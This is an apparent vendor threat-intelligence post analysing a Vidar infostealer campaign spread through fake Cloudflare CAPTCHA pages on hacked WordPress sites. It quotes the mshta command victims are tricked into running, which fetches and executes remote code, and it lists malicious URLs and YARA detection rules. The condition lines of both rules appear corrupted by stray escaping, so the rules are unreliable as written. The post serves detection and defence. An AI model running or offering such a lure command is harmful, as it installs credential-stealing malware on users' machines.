Analysis: Vidar Infostealer Campaigns Weaponize "ClickFix" Tactics via Compromised CMS
In the evolving landscape of cybercrime, the barrier to entry for distributing sophisticated malware is increasingly shifting from technical exploits to advanced social engineering. Recent findings analyzed by the SecLookup Threat Research team, in conjunction with reports from Malwarebytes Labs, highlight a resurgence of the Vidar Infostealer being distributed via "ClickFix" tactics. This campaign leverages compromised WordPress websites across the globe—including Italy, France, the United States, and Brazil—to trick users into manually executing malicious commands. By mimicking legitimate security verification services like Cloudflare, threat actors bypass traditional browser-based sandbox protections, forcing the user to become the final link in the infection chain.
Executive Summary
The latest Vidar campaign demonstrates a sophisticated use of the "ClickFix" or "Fake CAPTCHA" technique. Rather than relying on automated browser vulnerabilities which are frequently patched, attackers exploit human psychology. Visitors to compromised WordPress sites are presented with a highly convincing "Verifying you are human" page. Under the guise of solving a CAPTCHA, the user is instructed to copy and paste a command into their Windows Run dialog or PowerShell terminal. This command initiates a chain of events that utilizes built-in Windows binaries—specifically mshta.exe—to download and execute the Vidar infostealer. SecLookup has been actively tracking this infrastructure and confirmed the malicious nature of key domains, such as walwood.be, associated with these delivery operations.
Threat Analysis: The ClickFix Evolution
The "ClickFix" technique represents a shift toward "browser-out" infections. Instead of a file downloading automatically (which triggers "Mark of the Web" warnings or EDR alerts upon execution), the attacker convinces the user that their browser is "broken" or needs verification.
The Infection Vector: Compromised CMS
The campaign primarily targets WordPress installations. Once a site is compromised—likely through credential stuffing or known plugin vulnerabilities—the attackers inject a script that redirects users to a fake Cloudflare verification page. This page is designed to appear identical to a legitimate "Under Attack Mode" or "Turnstile" challenge.
Technical Chain: Abusing Mshta.exe
When a user follows the instructions on the fake CAPTCHA page, they are typically told to press Win+R, paste a command, and hit enter. The command observed in this campaign follows a specific pattern:
mshta https://{compromised-website}/challenge/cf
Mshta.exe (Microsoft HTML Application Host) is a legitimate Windows utility used to execute .hta files. Because it is a signed Microsoft binary, it is frequently used by threat actors as a "Living-off-the-Land" binary (LoLBin) to bypass application whitelisting. In this context, mshta fetches a remote HTA script from the compromised site's /challenge/cf directory. This script then executes an obfuscated payload that downloads the final Vidar installer, often in the form of an .msi file.
Vidar Infostealer Capabilities
Vidar is a prolific "stealer-as-a-service" malware that has been active since 2018. Once executed, it resides primarily in memory to evade file-based antivirus scanning. Its primary objectives include:
Credential Harvesting: Extracting usernames and passwords from over 30 different web browsers (Chrome, Firefox, Edge, etc.).
Cryptocurrency Theft: Searching for local wallet files (e.g., Electrum, Ethereum, Exodus) and browser-based wallet extensions.
Session Hijacking: Stealing browser cookies and authentication tokens to bypass Multi-Factor Authentication (MFA).
System Profiling: Collecting hardware specs, IP addresses, and screenshots of the victim's desktop.
Data Exfiltration: Once the data is staged, it is compressed into a ZIP file and sent to a remote Command and Control (C2) server.
MITRE ATT&CK Mapping
The TTPs observed in this campaign align with the following MITRE ATT&CK techniques:
| ID | Technique | Description |
|---|---|---|
| T1566.002 | Phishing: Spearphishing Link | Users are directed to compromised websites via various external vectors. |
| T1204.001 | User Execution: Malicious Link | The attack relies on the user manually entering commands provided by the site. |
| T1218.005 | System Binary Proxy Execution: Mshta | Use of mshta.exe to execute malicious HTA files. |
| T1059.007 | Command and Scripting Interpreter: JavaScript | The fake CAPTCHA pages utilize JS to facilitate the social engineering. |
| T1005 | Data from Local System | Vidar targets local browser databases and wallet files. |
| T1041 | Exfiltration Over C2 Channel | Stolen data is sent to attacker-controlled infrastructure. |
Indicators of Compromise (IOCs)
SecLookup has confirmed the following indicators as malicious. Security teams should monitor for any outbound traffic to these domains or execution patterns involving these URL structures.
Confirmed Malicious Domains
walwood[.]be
Malicious URLs
https://walwood[.]be/474a2b77/5ef46f21e2.msi
https://{compromised-website}/challenge/cf
https://{compromised-website}/474a2b77/5ef46f21e2.msi
Detection Rules
YARA Rule: Vidar ClickFix Delivery Command
This rule targets the specific command line arguments used to trigger the mshta download.
rule Vidar_ClickFix_Delivery_Command {
meta:
description = "Detects the mshta command pattern used in ClickFix campaigns to download Vidar payloads"
threat_name = "Vidar Infostealer"
technique = "ClickFix / Fake CAPTCHA"
strings:
$mshta = "mshta" nocase
$path = "/challenge/cf" ascii wide
$protocol1 = "https://" ascii wide
$protocol2 = "http://" ascii wide
condition:
\(mshta and \)path and (\(protocol1 or \)protocol2)
}
YARA Rule: Fake Cloudflare Verification Page
This rule identifies the source code of the malicious HTML landing pages.
rule Fake_Cloudflare_Verification_ClickFix {
meta:
description = "Detects HTML/JS content of fake Cloudflare verification pages used for malware delivery"
threat_name = "Vidar Infostealer"
strings:
$s1 = "Verifying you are human" ascii wide
$s2 = "mshta" ascii wide
$s3 = "/challenge/cf" ascii wide
$s4 = "walwood.be" ascii wide
condition:
\(s1 and (\)s2 and \(s3) or \)s4
}
SecLookup Detection
The SecLookup threat intelligence platform was actively detecting and blocking the domains and infrastructure associated with this Vidar campaign prior to public disclosure. Our platform identified walwood[.]be as a malicious distribution point.
Subscribers to SecLookup’s feed were protected through automated updates to their DNS firewalls and EDR blocklists. Our continuous monitoring of compromised CMS environments allows us to provide early warning indicators for "ClickFix" campaigns, ensuring that SOC analysts can intercept these threats before a user manually executes the malicious payload.
Recommendations
To defend against Vidar and similar social engineering-led campaigns, SecLookup recommends the following actions:
Restrict Mshta Execution: Use Windows Attack Surface Reduction (ASR) rules or AppLocker to block or audit the execution of
mshta.exeunless strictly required for business operations.User Education: Conduct specialized phishing training that highlights "ClickFix" tactics. Emphasize that legitimate services like Cloudflare or Google CAPTCHA will never ask a user to run a command or use the Windows Run dialog.
Endpoint Monitoring: Configure EDR tools to alert on unusual parent-child process relationships, such as
browser.exe(Chrome/Edge) spawningcmd.exe,powershell.exe, ormshta.exe.Network Filtering: Implement a robust DNS security solution to block access to known malicious domains and newly registered domains (NRDs) frequently used in these campaigns.
Browser Security: Ensure browsers are kept up to date and consider implementing "Safe Browsing" policies that restrict interactions with unverified scripts.
References
- Hacked sites deliver Vidar infostealer to Windows users by Malwarebytes Labs, Malwarebytes Labs
